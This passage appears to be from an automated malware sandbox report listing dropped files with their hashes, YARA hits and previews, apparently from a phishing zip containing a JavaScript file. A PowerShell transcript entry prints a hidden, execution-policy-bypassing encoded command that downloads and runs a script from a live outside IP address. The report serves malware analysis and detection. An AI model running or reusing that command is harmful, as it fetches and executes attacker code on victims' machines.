                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\icon_128.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4364
                                                                                                                                                                Entropy (8bit):7.915848007375225
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:YjlLDJjTvXUtNvX8dgb9HT6y8nviyHG5iCRYtIP:YtNTfUzvX8KM+MGRsIP
                                                                                                                                                                MD5:4DBC9F9E6F5A08D299BAC9E54DF07694
                                                                                                                                                                SHA1:BB38F5DE34B1E0BE1109220BA55271087A4D9EA5
                                                                                                                                                                SHA-256:91C2718DD23B4356D71F88F6146868369033291086DF327534546DFA459BEB0E
                                                                                                                                                                SHA-512:A5F2B1F47502836130D8083F757B7773C1E1CB36B76AD298CC29AB2B428C8002D2F15BD839838FC326DAC3681C2F48AB25A3E7631D33726C4B25E8EC14170912
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .PNG........IHDR..............>a.....IDATx..yp.....gF#.:,[H.l.l..8...`/.k....,!a7Km...E...Te..T.....J...p....%.(....+...3....eY.e...L.o...5....h4...\....{?....~.u.`0.....`0.....`0.....`.Y......[(.......).4....ai..w38.+....Bf././..]...{......8...3.....3W~OJ.. /...u6V.C..U.0.+._=.c..9.X.?....L....S@.L...m.0..>.C...L|TF.p5..f4M.,.V....8..a.<...RP..@)E,..E"...h.....!...-....,I..T..........m..._[[{w{{....{*.^......M.x..h4.h.....\.R.E....j).7.....h4.A.E....,. ...iii.Vj?2...=/.B.FK9P..@)=Rj..D".Y...2.B..x.}0...&J...2.......f.O..e.H.....!.J)'I..R....B............QJ;K..L...L.l".L~mhh.R.@).FFF~.L&...~.B.......u.........}.....~.....f..yUU...........^M...6......].,w.e..~.!$.C.R.....E(%e9.,....k..@...W8.........@...........O..@%.~..@.S..P.....`Tp...."...?ME..c......s...`..S1...7.b..aNE..k...3.yP.}.Ch.}......B..........IPE..C.<....T....k......Z..o_......g........P..A=y.J.)h..@.q.-.*].AU.4...F.M.....y%B]+ .\.~..9......:..=...r.....E].o...F..P........i...|....
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\icon_16.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):558
                                                                                                                                                                Entropy (8bit):7.505638146035601
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7vyVgSKYsfFzXxXsrPfA+b0YX+5IOUWCQKznuow7:6yVnKYsfFzhXsrIq0YXmgQGn6
                                                                                                                                                                MD5:FB9C46EA81AD3E456D90D58697C12C06
                                                                                                                                                                SHA1:5FC450F7D73CCFAC8F0D818CB3392BA4D91B69DE
                                                                                                                                                                SHA-256:016CA659BA080E194FBFC0929602B16506ED60AA6019FAA51410C4FD93B583E8
                                                                                                                                                                SHA-512:ADD810EE9EB7CAEC505B5FD90A1F184CE39D8F8C689DCC240F188FE353B9575489492E07D572A3B1C11A1555CE66AFCA5134903E4C1AA3D54BC7C5ED3E65B50C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .PNG........IHDR................a....IDAT8...Mk.Q...;... .....F..QW.....F....J.?.w..7~......'.Q..B]... .QS...M&_w..b&.|`......p...f.?.D$.y^..........y*...\..Z..t6..oRj.@&.u..G.qN).t.-V*.>(.N.Ep]wFk.60o.]0.`Y..cT..Y.Tb.`DF.d..s.Z..E..9.4._C.._...%..*.^....4.l...Y..X..R..../...Wj+w0[.].._B.k.${.\.>.%...........lz .w.ALxo.2;..a...".p..S..&..uXS...<..6..[..zD.._.N+w.WbM7ye6X<...'(,=.r}........$f..5..P....k..."..8.s.<zgSm@.....).Y.....:e..|.....F...I..A$.....T?.....m....8.........N...z.....V..vd.h'....C.?.....H.;]..C.M.....9.b......IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):160
                                                                                                                                                                Entropy (8bit):5.475799237015411
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/RPJDmV7bScsP4a9zln94FptVp:6v/lhPKM4nDspnAkZJNmgPdln2TTp
                                                                                                                                                                MD5:8803665A6328D23CC1014A7B0E9BE295
                                                                                                                                                                SHA1:9DA6EE729D5A6E9F30658B8EC954710F107A641F
                                                                                                                                                                SHA-256:D5F9234DC36E7FFA85F35B2359A4F82276F8395EFA76E4553507EA990B27FC6C
                                                                                                                                                                SHA-512:ECD9E71B8BA1ED8BD4CA5A0936CB66A83611C4ABCBDA76C250F4CDF4AD80320212E8F5EEB79A38910718F8346ECC1AD580A3FA835EC2B22BE497F36899FB5930
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...Q..0......2...(p...~Z.}'.>I%O...V!s..................../...`.<..`.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_close.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):252
                                                                                                                                                                Entropy (8bit):6.512071394066515
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:6v/lhPKM4nDsp7q1hKVlomsj9rxKNgtmN0VZ+GFYep:6v/7iMXVq1ylxemNgtmKVnYM
                                                                                                                                                                MD5:0599DFD9107C7647F27E69331B0A7D75
                                                                                                                                                                SHA1:3198C0A5F34DB67F91A0035DBC297354CBC95525
                                                                                                                                                                SHA-256:131817CD9311C03DF22D769DD2AD7FA2E6E9558863A89F7E5E1657424031A937
                                                                                                                                                                SHA-512:0076ACB9D6A886BD987876E49495038F9388B292A9EFE5C9093CCA64CA3692E3A5D24E35172C7697F6AAE34B86CA217EE59C003423E46D9499BD27EC7D77A649
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...... ..Pp.X....H...b@...|.^LC_.E.BP+......X.P..........q..~..p/. ..s.....%D^...$......@.!...<...).?.4{.k.G3...4..[cH..0..l.8.!r..m.R..{..........`.f...#.x.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_hover.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):160
                                                                                                                                                                Entropy (8bit):5.423186859407619
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEHxrPLyN+ltNPhv/l2up:6v/lhPKM4nDspnAkZHVtERrPLygltNPn
                                                                                                                                                                MD5:7CB6B9DC1A30F63B8BD976924B75AD96
                                                                                                                                                                SHA1:0C40B0C496D2F2B5F2021C117EC8610AC03AB469
                                                                                                                                                                SHA-256:721B7AAA9A42A54A349881615A12E3A26983ACA48E173FD2F66E66AA0D725735
                                                                                                                                                                SHA-512:4764937364E355956B242B84010AC56102536D2AACBE4227F0E88E4DE7AB468571957EA6C33012539156E5349AE4F777115615AE3361F60ADDF9CD227424F76A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B.z.s...*.....$.<u..[...................h.......C.CA).....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_maximize.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):166
                                                                                                                                                                Entropy (8bit):5.8155898293424775
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZttd//HmnFz1P/ZjXlUTqyCIc30ItK1p:6v/lhPKM4nDsptF/HOP/ZjXlUeyCo/p
                                                                                                                                                                MD5:232CE72808B60CBE0F4FA788A76523DF
                                                                                                                                                                SHA1:721A9C98C835D2CD734153BBE07833C6637ECD68
                                                                                                                                                                SHA-256:AFA4EA944CBDEC8543242E627EF46D5BFD3766DCAC664E7E50CDEEF2B352740C
                                                                                                                                                                SHA-512:4048EEA5A78DD569521C488C4CE4F7B77AC0454C92EE9107A81A1B3AF91A4EE036039AC1A0A6B8DD26B12E7F1595DB80B7FAA7B6A25D9032BF385528A81A8654
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...HIDATx......0.CQS.......~..."..........m.v+Sq....<!...M8m...'...@$..0....E........IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\topbar_floating_button_pressed.png
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):160
                                                                                                                                                                Entropy (8bit):5.46068685940762
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtnAkx/9lVtEXIyN+ltN1/lsg1p:6v/lhPKM4nDspnAkZHVtEZgltN1eup
                                                                                                                                                                MD5:E0862317407F2D54C85E12945799413B
                                                                                                                                                                SHA1:FA557F8F761A04C41C9A4BA81994E43C6C275DBB
                                                                                                                                                                SHA-256:5C10CE0589EB115600F77381130B70AE0B7B3752614D86D4C89E857658AA222B
                                                                                                                                                                SHA-512:07CB69327961FD0019BEF8EF7590B5524905AC373A815F73F6D9E0B26840929F919A96CAA977D4B5656704DACD0F352D568FB3997F80EE6BB94C95B58839DBFE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx...A..0...+B..@wu...*.....$.<u..[...................h.........M..x(....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\manifest.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1322
                                                                                                                                                                Entropy (8bit):5.449026004350873
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEis7ViC/yox/fiqeUoLFlmF1s80FKrGfd0d3NZNZx1Fq7eY7nfj1B:WL7V2opiV1mvs8rxTZRczhB
                                                                                                                                                                MD5:01334FB9D092AF2AA46C4185E405C627
                                                                                                                                                                SHA1:47AD3C0E82362FFE5B881DF8D71D6F79AB7F5796
                                                                                                                                                                SHA-256:F52714812D68C577A445169D11E84DF6751C2D6886BC429643072BB5D61C6C27
                                                                                                                                                                SHA-512:888D96ADB7A847ABE472145258C8C46950EB2FA3BA7D596C2E90A17C8FB06FD0155C56CC8ABA5D076D89368417464BCB2D236F9E40E53241950A01F9F8ED548F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app": {.. "background": {.. "scripts": [ "craw_background.js" ].. }.. },.. "default_locale": "en",.. "description": "__MSG_APP_DESCRIPTION__",.. "display_in_launcher": false,.. "display_in_new_tab_page": false,.. "icons": {.. "128": "images/icon_128.png",.. "16": "images/icon_16.png".. },.. "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCrKfMnLqViEyokd1wk57FxJtW2XXpGXzIHBzv9vQI/01UsuP0IV5/lj0wx7zJ/xcibUgDeIxobvv9XD+zO1MdjMWuqJFcKuSS4Suqkje6u+pMrTSGOSHq1bmBVh0kpToN8YoJs/P/yrRd7FEtAXTaFTGxQL4C385MeXSjaQfiRiQIDAQAB",.. "manifest_version": 2,.. "minimum_chrome_version": "29",.. "name": "__MSG_APP_NAME__",.. "oauth2": {.. "auto_approve": true,.. "client_id": "203784468217.apps.googleusercontent.com",.. "scopes": [ "https://www.googleapis.com/auth/sierra", "https://www.googleapis.com/auth/sierrasandbox", "https://www.googleapis.com/auth/chromewebstore", "https://www.googleapis.com/auth/chromewebstore.readonly" ].. },.
                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.acl
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Spelling\en-US\default.exc
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2
                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ..
                                                                                                                                                                C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3501
                                                                                                                                                                Entropy (8bit):5.52545121438824
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:BZ/I/NG0V/ncqyo1ZosZrI/NG0V/ncqyo1ZNtU9J9J9vZl:L0V/e40V/K
                                                                                                                                                                MD5:16E115A797F1A607F50F90F1FEFE9C62
                                                                                                                                                                SHA1:5449A9971D8237CBD039BD7E368DCD83E2B86B19
                                                                                                                                                                SHA-256:E91B1A695385A6C083D1F3235B4D4C72323F01223BD05F97DC0A02A77146EA6D
                                                                                                                                                                SHA-512:C3867BB16075B24834360C85ECEA7D5E762573EC0C482CADC5D7CC34359D8D6C212A72CA0229D249FCCF6C693F017AF6065B12F4A1E73ED48BA94C2B89CC14BB
                                                                                                                                                                Malicious:true
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt, Author: Joe Security
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210816191151..Username: user-PC\user..RunAs User: user-PC\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.18363.0)..Host Application: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=..Process ID: 7296..PSVersion: 5.1.18362.145..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.18362.145..BuildVersion: 10.0.18362.145..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210816191151..**********************..PS>IEX (New-Object Net.Webclient).downloadstring("http://185.244.41.28/click.php")..**********************..Windows P
                                                                                                                                                                C:\Users\user\Downloads\45a0c03f-0a41-4db8-a68f-a38838469835.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1491
                                                                                                                                                                Entropy (8bit):7.755989345720528
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:96Tm9xD2v5DXr6hWQI2ejEqbe81+s0CzQwlVByS/WwbYfrUODkqlBwlbs/in:96wO5rr6gjjEgGs0slVBySlbW9kE64Kn
                                                                                                                                                                MD5:A6F3E94CDD151ECDA382BA02E6D9BC69
                                                                                                                                                                SHA1:50080375F7360E71DAEE29BB1C11103570455CD2
                                                                                                                                                                SHA-256:8832A03DBE27F5750083F4F41D4059A80E79449EDF609B7643813481065B0B90
                                                                                                                                                                SHA-512:FE69DC082C2814EF21CA35C5606A491FC88C6BD8D1161EDCD20EE6BCA2EE127B389BD77C9733EF860FC8B6CFCEA75B1931C9B035C7675E419F6C02F89FC034AC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: PK........{t.S).......~.......Order_Report_12.js..+...a.V..c'..w..z...3#....-\....p<,.....S..}KoV$...'m.wl&>=.V.sY..m...A.X...R6.0.B.k.x......%..C+3.....@.....nGv..|...c.`...@B....N.........:n.n.......Y...|G"...}..X...W.ub.P|.U.j....a"..(.3y......{...x.I.|.....@.V1.I\R.].1}g.....^......n.{...x..KR...P.q5.6+..kq<...!.H..].l..\.=<....]o.{.....]%..+...G.Mv..^o.T.9....h..|...E.^.Q....m.....@ua.z.e).*.8...w.!.........4.ia.......8.i.)x...t)..8.x9.{Y.'.O(..l...y...5...0...1.5d).......8x.{.M....<9.!...c<h.H.tw......b<....#...$j.k.....v.[.....J..I.!B.J..t.$....Y..g.o~^.H.{.P........Ss.K %..8.@.....th?.n..^..0.d...+.......x,L.@$...C6......Qs=...'......M/].^E.Dn..;Z.K1.D0..9.....I~I......z..Tq..|...FC...h..(.,....U..qi....3.Q.+...K3.{..K...k.?z.q..2BF..M..R..o.....,..#L.i...%..}......SUrF..h..0....x......X..,E'3..1.w.U~.*J...N.......a..]h>..W..R....E.?!.%z(.U.,..D..h..P.+.#..B%Mft......]6.1..9.q..J.i.d,..(......'CM.m.yE0.......S.......W.
                                                                                                                                                                C:\Users\user\Downloads\Report_03874 (1).zip:Zone.Identifier
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):50
                                                                                                                                                                Entropy (8bit):4.349275070710713
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:gAWY3tNQWuKQS6J:qY3tNpqtJ
                                                                                                                                                                MD5:DCE5191790621B5E424478CA69C47F55
                                                                                                                                                                SHA1:AE356A67D337AFA5933E3E679E84854DEEACE048
                                                                                                                                                                SHA-256:86A3E68762720ABE870D1396794850220935115D3CCC8BB134FFA521244E3EF8
                                                                                                                                                                SHA-512:A669E10B173FCE667D5B369D230D5B1E89E366B05BA4E65919A7E67545DD0B1ECA8BCB927F67B12FE47CBE22B0C54C54F1E03BEED06379240B05B7B990C5A641
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: [ZoneTransfer]..ZoneId=3..HostUrl=about:internet..
                                                                                                                                                                C:\Users\user\Downloads\Report_03874.zip:Zone.Identifier
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):50
                                                                                                                                                                Entropy (8bit):4.349275070710713
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:gAWY3tNQWuKQS6J:qY3tNpqtJ
                                                                                                                                                                MD5:DCE5191790621B5E424478CA69C47F55
                                                                                                                                                                SHA1:AE356A67D337AFA5933E3E679E84854DEEACE048
                                                                                                                                                                SHA-256:86A3E68762720ABE870D1396794850220935115D3CCC8BB134FFA521244E3EF8
                                                                                                                                                                SHA-512:A669E10B173FCE667D5B369D230D5B1E89E366B05BA4E65919A7E67545DD0B1ECA8BCB927F67B12FE47CBE22B0C54C54F1E03BEED06379240B05B7B990C5A641
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: [ZoneTransfer]..ZoneId=3..HostUrl=about:internet..
                                                                                                                                                                C:\Users\user\Downloads\Unconfirmed 248836.crdownload (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1491
                                                                                                                                                                Entropy (8bit):7.755989345720528
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:96Tm9xD2v5DXr6hWQI2ejEqbe81+s0CzQwlVByS/WwbYfrUODkqlBwlbs/in:96wO5rr6gjjEgGs0slVBySlbW9kE64Kn
                                                                                                                                                                MD5:A6F3E94CDD151ECDA382BA02E6D9BC69
                                                                                                                                                                SHA1:50080375F7360E71DAEE29BB1C11103570455CD2
                                                                                                                                                                SHA-256:8832A03DBE27F5750083F4F41D4059A80E79449EDF609B7643813481065B0B90
                                                                                                                                                                SHA-512:FE69DC082C2814EF21CA35C5606A491FC88C6BD8D1161EDCD20EE6BCA2EE127B389BD77C9733EF860FC8B6CFCEA75B1931C9B035C7675E419F6C02F89FC034AC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: PK........{t.S).......~.......Order_Report_12.js..+...a.V..c'..w..z...3#....-\....p<,.....S..}KoV$...'m.wl&>=.V.sY..m...A.X...R6.0.B.k.x......%..C+3.....@.....nGv..|...c.`...@B....N.........:n.n.......Y...|G"...}..X...W.ub.P|.U.j....a"..(.3y......{...x.I.|.....@.V1.I\R.].1}g.....^......n.{...x..KR...P.q5.6+..kq<...!.H..].l..\.=<....]o.{.....]%..+...G.Mv..^o.T.9....h..|...E.^.Q....m.....@ua.z.e).*.8...w.!.........4.ia.......8.i.)x...t)..8.x9.{Y.'.O(..l...y...5...0...1.5d).......8x.{.M....<9.!...c<h.H.tw......b<....#...$j.k.....v.[.....J..I.!B.J..t.$....Y..g.o~^.H.{.P........Ss.K %..8.@.....th?.n..^..0.d...+.......x,L.@$...C6......Qs=...'......M/].^E.Dn..;Z.K1.D0..9.....I~I......z..Tq..|...FC...h..(.,....U..qi....3.Q.+...K3.{..K...k.?z.q..2BF..M..R..o.....,..#L.i...%..}......SUrF..h..0....x......X..,E'3..1.w.U~.*J...N.......a..]h>..W..R....E.?!.%z(.U.,..D..h..P.+.#..B%Mft......]6.1..9.q..J.i.d,..(......'CM.m.yE0.......S.......W.
                                                                                                                                                                C:\Users\user\Downloads\Unconfirmed 251984.crdownload1. (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1491
                                                                                                                                                                Entropy (8bit):7.755989345720528
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:96Tm9xD2v5DXr6hWQI2ejEqbe81+s0CzQwlVByS/WwbYfrUODkqlBwlbs/in:96wO5rr6gjjEgGs0slVBySlbW9kE64Kn
                                                                                                                                                                MD5:A6F3E94CDD151ECDA382BA02E6D9BC69
                                                                                                                                                                SHA1:50080375F7360E71DAEE29BB1C11103570455CD2
                                                                                                                                                                SHA-256:8832A03DBE27F5750083F4F41D4059A80E79449EDF609B7643813481065B0B90
                                                                                                                                                                SHA-512:FE69DC082C2814EF21CA35C5606A491FC88C6BD8D1161EDCD20EE6BCA2EE127B389BD77C9733EF860FC8B6CFCEA75B1931C9B035C7675E419F6C02F89FC034AC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: PK........{t.S).......~.......Order_Report_12.js..+...a.V..c'..w..z...3#....-\....p<,.....S..}KoV$...'m.wl&>=.V.sY..m...A.X...R6.0.B.k.x......%..C+3.....@.....nGv..|...c.`...@B....N.........:n.n.......Y...|G"...}..X...W.ub.P|.U.j....a"..(.3y......{...x.I.|.....@.V1.I\R.].1}g.....^......n.{...x..KR...P.q5.6+..kq<...!.H..].l..\.=<....]o.{.....]%..+...G.Mv..^o.T.9....h..|...E.^.Q....m.....@ua.z.e).*.8...w.!.........4.ia.......8.i.)x...t)..8.x9.{Y.'.O(..l...y...5...0...1.5d).......8x.{.M....<9.!...c<h.H.tw......b<....#...$j.k.....v.[.....J..I.!B.J..t.$....Y..g.o~^.H.{.P........Ss.K %..8.@.....th?.n..^..0.d...+.......x,L.@$...C6......Qs=...'......M/].^E.Dn..;Z.K1.D0..9.....I~I......z..Tq..|...FC...h..(.,....U..qi....3.Q.+...K3.{..K...k.?z.q..2BF..M..R..o.....,..#L.i...%..}......SUrF..h..0....x......X..,E'3..1.w.U~.*J...N.......a..]h>..W..R....E.?!.%z(.U.,..D..h..P.+.#..B%Mft......]6.1..9.q..J.i.d,..(......'CM.m.yE0.......S.......W.
                                                                                                                                                                C:\Users\user\Downloads\e912813c-9e21-4b82-863d-c7837a42a695.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1491
                                                                                                                                                                Entropy (8bit):7.755989345720528
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:96Tm9xD2v5DXr6hWQI2ejEqbe81+s0CzQwlVByS/WwbYfrUODkqlBwlbs/in:96wO5rr6gjjEgGs0slVBySlbW9kE64Kn
                                                                                                                                                                MD5:A6F3E94CDD151ECDA382BA02E6D9BC69
